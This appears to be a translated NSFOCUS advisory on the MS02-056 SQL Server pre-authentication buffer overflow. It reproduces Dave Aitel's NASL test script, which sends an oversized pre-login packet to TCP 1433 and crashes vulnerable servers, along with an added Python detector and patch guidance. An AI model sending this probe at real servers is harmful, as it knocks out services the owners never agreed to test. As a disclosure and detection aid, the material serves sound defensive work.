
Security Vulnerabilities
Microsoft SQL Server Pre-Authentication Remote Buffer Overflow Vulnerability (MS02-056)

Published: 2002-08-06
Updated: 2002-10-09

Affected systems:
Microsoft SQL Server 2000
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP2
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Description:
BUGTRAQ  ID: 5411
CVE(CAN) ID: CVE-2002-1123

Microsoft SQL Server is a large-scale database system developed by Microsoft.

Microsoft SQL Server has a vulnerability in its pre-authentication processing that a remote attacker can use to mount a buffer overflow attack.

The flaw lies in the pre-authentication (pre-login) handshake: a remote attacker who can connect to TCP port 1433 can trigger a buffer overflow there. Because the problem occurs before any authentication takes place, the attacker needs no credentials at all, and successful exploitation may allow arbitrary code to be executed on the system with the privileges of the SQL Server process.


<*Source: Dave Aitel ([email protected])

  Links: http://marc.theaimsgroup.com/?l=bugtraq&m=102873609025020&w=2
         http://marc.theaimsgroup.com/?l=bugtraq&m=102865925419469&w=2
         http://www.microsoft.com/technet/security/bulletin/MS02-056.asp
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

Dave Aitel ([email protected]) provided the following NASL test script:

##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


if(description)
{
script_id(11067);
script_cve_id("CVE-2002-1123");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);

desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);

script_category(ACT_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
script_require_ports(1433);
exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        # uncomment this to see what normally happens (a legitimate pre-login)
        #attack_string = "MSSQLServer";
        # the next line is the actual overflow test: 560 filler bytes in place
        # of the instance name that the packet's option table declares as 12 bytes
        attack_string = crap(560);
        # this creates a variable called sql_packet
        sql_packet = pkt_hdr + attack_string + pkt_tail;
        send(socket:soc, data:sql_packet);

        r = recv(socket:soc, length:4096);
        close(soc);
        display("Result:", r, "\n");
        # no reply at all is taken as the service having crashed on the overlong field
        if(!r)
        {
            display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
        }
    }
}
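
As an added example (not part of the NSFOCUS advisory and not Dave Aitel's code), the following Python rebuilds the probe from the script's own pkt_hdr / pkt_tail bytes and then parses it back as a TDS PRELOGIN message, flagging the two things that distinguish the overflow probe from a normal pre-login: an instance-name (INSTOPT) field far longer than the 12 bytes the option table declares, and a packet longer than the TDS header announces. The byte layout is taken from the script; the option-token names follow the TDS protocol documentation; the 32-byte policy threshold, the function names and both sample packets are assumptions made for this example.

```python
"""Parse TDS PRELOGIN (type 0x12) packets and flag the oversized instance-name
field used by the MS02-056 "Hello" overflow.

Added example; this is not code from the NSFOCUS advisory or from Dave Aitel's
NASL script. The byte layout is copied from the script's pkt_hdr / pkt_tail;
the policy threshold and the two sample packets are constructed assumptions.
"""
import struct

TDS_PRELOGIN = 0x12
TOKEN_TERMINATOR = 0xFF
# PRELOGIN option token types (names as in the TDS protocol documentation)
TOKEN_NAMES = {0x00: "VERSION", 0x01: "ENCRYPTION", 0x02: "INSTOPT", 0x03: "THREADID"}

# Same bytes as pkt_hdr in the NASL script: an 8-byte TDS header (type, status,
# big-endian length 0x0034, spid, packet id, window), four option tokens of
# (type, offset, length), the 0xff terminator, 6 bytes of VERSION data and
# 1 byte of ENCRYPTION data. Offsets are relative to the start of the payload.
PKT_HDR = bytes([
    0x12, 0x01, 0x00, 0x34, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x15, 0x00, 0x06,        # VERSION    at 0x15, 6 bytes
    0x01, 0x00, 0x1b, 0x00, 0x01,        # ENCRYPTION at 0x1b, 1 byte
    0x02, 0x00, 0x1c, 0x00, 0x0c,        # INSTOPT    at 0x1c, 12 bytes
    0x03, 0x00, 0x28, 0x00, 0x04,        # THREADID   at 0x28, 4 bytes
    0xff,
    0x08, 0x00, 0x02, 0x10, 0x00, 0x00,  # VERSION data
    0x00,                                # ENCRYPTION data
])
# Same bytes as pkt_tail: NUL terminating the instance name, then THREADID data.
PKT_TAIL = bytes([0x00, 0x24, 0x01, 0x00, 0x00])


def build_prelogin(instance_name: bytes) -> bytes:
    """Assemble the packet the way the NASL script does (pkt_hdr + name + pkt_tail).
    Neither the TDS length (0x0034) nor the INSTOPT length (12) is adjusted, so a
    long name overruns what the option table declares; that is the overflow."""
    return PKT_HDR + instance_name + PKT_TAIL


def parse_prelogin(packet: bytes) -> dict:
    """Decode the TDS header and the PRELOGIN option table."""
    if len(packet) < 8:
        raise ValueError("short TDS header")
    ptype, _status, declared_len, _spid, _pkt_id, _window = struct.unpack(">BBHHBB", packet[:8])
    if ptype != TDS_PRELOGIN:
        raise ValueError("not a PRELOGIN packet (type 0x%02x)" % ptype)
    payload = packet[8:]
    tokens = {}
    pos = 0
    while pos < len(payload) and payload[pos] != TOKEN_TERMINATOR:
        if pos + 5 > len(payload):
            raise ValueError("truncated option token")
        ttype, offset, length = struct.unpack(">BHH", payload[pos:pos + 5])
        tokens[TOKEN_NAMES.get(ttype, "0x%02x" % ttype)] = (offset, length)
        pos += 5
    return {"declared_len": declared_len, "actual_len": len(packet),
            "tokens": tokens, "payload": payload}


def inspect_prelogin(packet: bytes, max_instance_len: int = 32) -> list:
    """Return a list of findings; an empty list means the packet looks ordinary.
    max_instance_len is an assumed policy limit for this example, not a protocol rule."""
    info = parse_prelogin(packet)
    findings = []
    if info["actual_len"] != info["declared_len"]:
        findings.append("length mismatch: header declares %d bytes, packet has %d"
                        % (info["declared_len"], info["actual_len"]))
    inst = info["tokens"].get("INSTOPT")
    if inst is None:
        return findings
    offset, declared = inst
    payload = info["payload"]
    if offset > len(payload):
        findings.append("INSTOPT offset 0x%x lies beyond the payload" % offset)
        return findings
    # The server treats the instance name as a NUL-terminated string starting at
    # the token offset, so measure what is actually on the wire up to the NUL.
    end = payload.find(b"\x00", offset)
    actual = (len(payload) if end == -1 else end) - offset
    if actual + 1 > declared:  # +1 for the NUL that the declared length includes
        findings.append("INSTOPT overrun: declared %d bytes, %d on the wire" % (declared, actual + 1))
    if actual > max_instance_len:
        findings.append("INSTOPT longer than policy limit of %d bytes" % max_instance_len)
    return findings


# Constructed samples: the normal probe and the same packet with a 560-byte
# filler in place of the instance name, mirroring crap(560) in the NASL script.
NORMAL_PROBE = build_prelogin(b"MSSQLServer")
OVERFLOW_PROBE = build_prelogin(b"X" * 560)

if __name__ == "__main__":
    for label, pkt in (("normal", NORMAL_PROBE), ("overflow", OVERFLOW_PROBE)):
        print(label, len(pkt), "bytes:", inspect_prelogin(pkt) or ["no findings"])
```

Running the file prints no findings for the 52-byte normal probe and three for the 601-byte overflow probe. A network sensor watching TCP 1433 could apply inspect_prelogin to the first client packet of each connection to spot this probe without ever sending it, which matters because the script's own detection method is to crash the service.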

Recommendations:
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Block access to the SQL Server service port from untrusted IP addresses, at the firewall or on the server itself

Vendor patches:

Microsoft
---------
Microsoft has released a security bulletin (MS02-056) and corresponding patches for this issue:
MS02-056: Cumulative Patch for SQL Server (Q316333)
Link: http://www.microsoft.com/technet/security/bulletin/MS02-056.asp

Patch downloads:

     * Microsoft SQL Server 7.0:
       http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tech
     * Microsoft SQL Server 2000:
       http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333&sd=tech

This vulnerability advisory was translated and compiled by NSFOCUS (綠盟科技). All rights reserved; it may not be reproduced without permission.